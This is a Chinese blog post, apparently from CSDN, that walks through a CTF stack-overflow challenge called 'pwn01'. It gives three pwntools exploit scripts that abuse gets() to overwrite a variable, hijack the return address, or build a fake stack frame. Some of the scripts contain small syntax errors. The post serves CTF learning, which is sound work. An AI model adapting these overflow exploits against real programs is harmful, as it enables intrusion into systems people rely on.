2019.7.21 pwn01 栈溢出的3种思路

最新推荐文章于 2024-02-01 10:37:29 发布

原创最新推荐文章于 2024-02-01 10:37:29 发布 · 336 阅读

0 ·

CC 4.0 BY-SA版权

pwn 专栏收录该内容

17 篇文章

订阅专栏

本文介绍了一种常见的安全漏洞——栈溢出，并提供了三种解决方法。通过使用Python的pwntools库，演示了如何利用gets函数的不安全性进行栈溢出攻击，包括直接覆盖变量、修改返回地址和构造伪栈帧等技术。

在这里插入图片描述

在这里插入图片描述

这是一道简单的栈溢出的问题。下面简绍3种解法。
①我们在IDA中查看s和a之间的距离，直接在利用gets函数的不安全性进行栈溢出覆盖a的值。这里要注意的是要加8而不是4,也就是变量所在的位置也要算。
exp为：

from pwn import *
sh=process("./pwn01)
payload="a"*(0x2c+8)+p32(0xCAFFBABE)
sh.sendline(payload)
sh.interactive()

②我们可以直接在填充完s和ebp以后，将返回地址设为下面那条拿到flag的语句。
exp：

from pwn import *
sh=process("./pwn01")
payload="a"*2c+p32(0x80485E0)
sh.sendline(payload)
sh.interactive()

③想让程序执行满足if语句中的指令，则需要满足一定的条件。也就是当func函数的参数满足一定的条件。那么我们可以构造一个伪栈帧，让程序再执行一次func，并将其参数设置为满足条件的数。
exp：

    from pwn import *
    sh=process("./pwn01")
    payload="a"*(0x28)+"a"*4+p32(0x8048590)+"a"*4+p32(0xcafebabe)
    sh.sendline(payload)
    sh

.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

藏蓝色的达达

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【PWN · 栈迁移】[BUUCTF]ciscn_2019_es_2

Mr_Fmnwon的博客

07-30

826

当前溢出可用空间比较少时（极端情况下仅能覆写ebp和ret），可以通过栈迁移的方式，扩大shellcode的容纳空间，其核心是将esp移动到一段shellocode开头。而esp总是由ebp赋值，所以总是通过两次leave;ret的方式修改esp到固定位置。一、代码审计有两次读入操作。read进的内容超过字符串的长度，存在栈溢出漏洞。然而计算溢出长度，发现只有8字节，即刚好可以覆写ebp和ret。发现system的函数（意味着plt对应的表项存在），然而这个hack函数并不能给出flag。

【CTF pwn】Windows下尝试栈溢出执行任意函数

hans774882968的博客

02-18

4169

buu-ciscn_2019_n_1是一道可以通过栈溢出修改变量为所需值的入门pwn。这题有两个解法，我受到这题的启发，搞一个Windows版本的小实验。目标：执行函数func。环境：Windows10，编译出的exe是32位的；小端存储。编译命令：g++ 1.cpp -g -o 1.exe，g++版本： Thread model: win32 gcc version 8.2.0 (MinGW.org GCC-8.2.0-5) 作者：hans774882968以及hans774882968 文章目录

参与评论您还未登录，请先登录后发表或查看评论

PWN入门01[攻防世界]

qq_43746493的博客

03-06

483

题目描述：菜鸡了解了什么是溢出，他相信自己能得到shell 题目链接： https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5053&page=1 环境：Kali+IDA Freeware7.6(之前在Ubuntu20上安装IDA6.4，F5无法查看伪代码) 参考博文： https://blog.csdn.net/qq_39596232/article/details/100036147

pwn 01

最新发布

2301_79970561的博客

02-01

1116

我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets)，这就是我们所要说的 ROP。栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数，因而导致与其相邻的栈中的变量的值被改变。这种问题是一种特定的缓冲区溢出漏洞，类似的还有堆溢出，bss 段溢出等溢出方式。ROP(Return Oriented Programming)，即返回导向编程，通过栈溢出内容覆盖返回地址，使其跳转到可执行文件中已有的片段代码中执行我们选择的代码段。

[BUUCTF-pwn] whitehat2018_pwn01

weixin_52640415的博客

12-30

464

又是一个代码巨长的程序,前十页没有有用的东西程序开了PIE但是直接给了地址,== no PIE 在sub_1178发现fgets(s, 230, stdin); 这里s定义是rbp-d0 可以溢出到reb 也就是可以在这移栈 int sub_1178() { void *v0; // rax char s[112]; // [rsp+0h] [rbp-D0h] BYREF char nptr[16]; // [rsp+70h] [rbp-60h] BYREF char s1[32]

pwn-栈迁移-ROP

leeham的博客

08-23

4390

# 栈迁移-ROP 题目描述这里给出题目链接 https://github.com/LeeHaming/CTF-learn/blob/master/easyR0p/easyR0p 程序的结构很简单，main()函数中有一个while(1)的循环，循环中rop()函数执行。 rop()中有明显的栈溢出，最开始给s申请的内存空间为:0x40；然而read()可以读入0x50字节。于是就...

记一次赛题--保护全开

qq_73149934的博客

01-17

491

记一次赛题--保护全开

Pwn基础学习1-[栈溢出]/篇2

m0_52343643的博客

03-29

2560

继上一篇的内容题目3-ret2syscall 定义控制程序执行系统调用原理不同于之前的 ret2text 和 ret2shellcode 题型，系统调用并不是执行程序中现有的代码或自己写进去的代码，其实就如其字面意思，系统调用就是我们让系统来调用一些函数，那么如何做到让系统来调用，需要满足以下几个条件：某函数的系统调用号【系统调用号表】—— 放在寄存器 eax 需传入某函数的参数 —— 放在寄存器 ebx、ecx、edx 一个指令 —— int 0x80 int 0x80（软中断）

linux 栈溢出

sky123博客

02-01

4457

栈基础知识栈结构函数调用过程 32位为例： KaTeX parse error: No such environment: align* at position 8: \begin{̲a̲l̲i̲g̲n̲*̲}̲ & \text{push a… 函数参数传递 32位程序普通函数传参：参数基本都压在栈上（有寄存器传参的情况，可查阅相关资料）。 syscall传参：eax对应系统调用号，ebx、ecx、edx、esi、edi、ebp分别对应前六个参数多余的参数压在栈上。 64位程序：普

pwn——栈迁移

m0_64195960的博客

07-13

509

栈迁移的基础知识，例题看完也能有所收获

一道pwn入门的练习题

10-23

直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例

一些关于Pwn的学习链接

Pwnpanda的博客

07-31

2603

暑假学习计划 - 0x01 最近整理一些有关Pwn的学习链接，同时也要感谢@某位小仙女的整理以后应该还会继续更新一些 0x00 Pwn整体学习路线&&相关知识点 https://ctf-wiki.github.io/ctf-wiki/ 0x01 一步一步学ROP之linux_x86篇 – 蒸米 http://www.vuln.cn/6645 0x02 一步一步学ROP之...

pwn1

u014281987的博客

08-27

1042

坑：记住是/bin/sh,不是bin/sh啊啊啊这道题的思路是先通过溢出使得游戏流程能够执行到到finger，首先劫持ret puts出（puts_addr+next_func_addr+argu）puts got plt表，再在对方服务器libc的帮助下，算出system puts偏移获得system实际地址，再如puts进行shell调用 from pwn import * io=

CTFpwn总结入门

热门推荐

九层台

04-26

2万+

学了那么久pwn了，基础知识终于积累的差不多了，来这个总结希望其他学pwn的人能少走一些弯路。 0x01学pwn需要哪些知识呢？堆栈是少不了的。要知道函数调用的时候，栈中的数据是怎么放的，知道ebp在哪，知道返回地址在哪。能看懂汇编，2条指令要清楚，ret和call。具备这些基础知识你就能够开始学pwn了。 0x02需要注意什么在溢出是要清楚2个...

Linux pwn入门教程(0)——环境配置

dfdhxb995397的博客

07-02

1064

作者：Tangerine@SAINTSEC 0×00前言作为一个毕业一年多的辣鸡CTF选手，一直苦于pwn题目的入门难，入了门更难的问题。本来网上关于pwn的资料就比较零散，而且经常会碰到师傅们堪比解题过程略的writeup和没有注释，存在大量硬编码偏移的脚本，还有练习题目难找，调试环境难搭建，GDB没有IDA好操作等等问题。作为一个老萌新(雾)，决定依据Atum师傅在i春秋上的p...

pwn入门

九层台

03-27

1万+

之前学过一点关于pwn，不过总是断断续续，学一点就停止了，这次准备好好学一下。推荐一个网站这是个练习pwn的很好的网站 FD 先连上去查看fd.c文件 main函数中：argc是命令行参数个数，char *argv[]是指所有命令行参数，char *envp[]是环境变量（argv[1]位置处存放的是命令行输入的第一个参数） atoi函数的作用是把字符转化为int型数据。 ...

[pwn] 1.二进制基础

H4ppyD0g的博客

09-01

409

文章目录C语言源代码到可执行文件生成过程可执行文件分类ELF文件格式静态链接和动态链接程序执行过程函数调用栈规则 C语言源代码到可执行文件生成过程编译：C源代码-》汇编代码汇编：汇编代码-》机器码链接：多个目标机器码-》一个可执行文件可执行文件分类 windows:PE 可执行程序.exe 动态链接库.dll 静态链接库.lib linux:ELF 可执行文件.out 动态链接库.so 静态链接库.a ELF文件格式 ELF文件头表(ELF header) 程序头表(Program header

linux_pwn0x01_fsb1

insomnia的博客

06-18

352

首先是源程序： #include <stdio.h> #include <stdlib.h> #include <string.h> int main() { char a[1024]; while(1) { memset(a,'\0',1024); read(0,a,1024); printf(a); //the fsb vulnerabil...

linux pwn练习0x01

yusakul的博客

11-19

533

pwn练习的记录

pwn+栈溢出解题思路

11-10

pwn是一种利用栈溢出漏洞的攻击方式，通常用于CTF比赛中。下面是一些pwn解题思路的步骤： 1. 找到漏洞：首先需要找到程序中的漏洞，通常是栈溢出漏洞或格式化字符串漏洞。 2. 利用漏洞：利用漏洞来执行恶意代码，...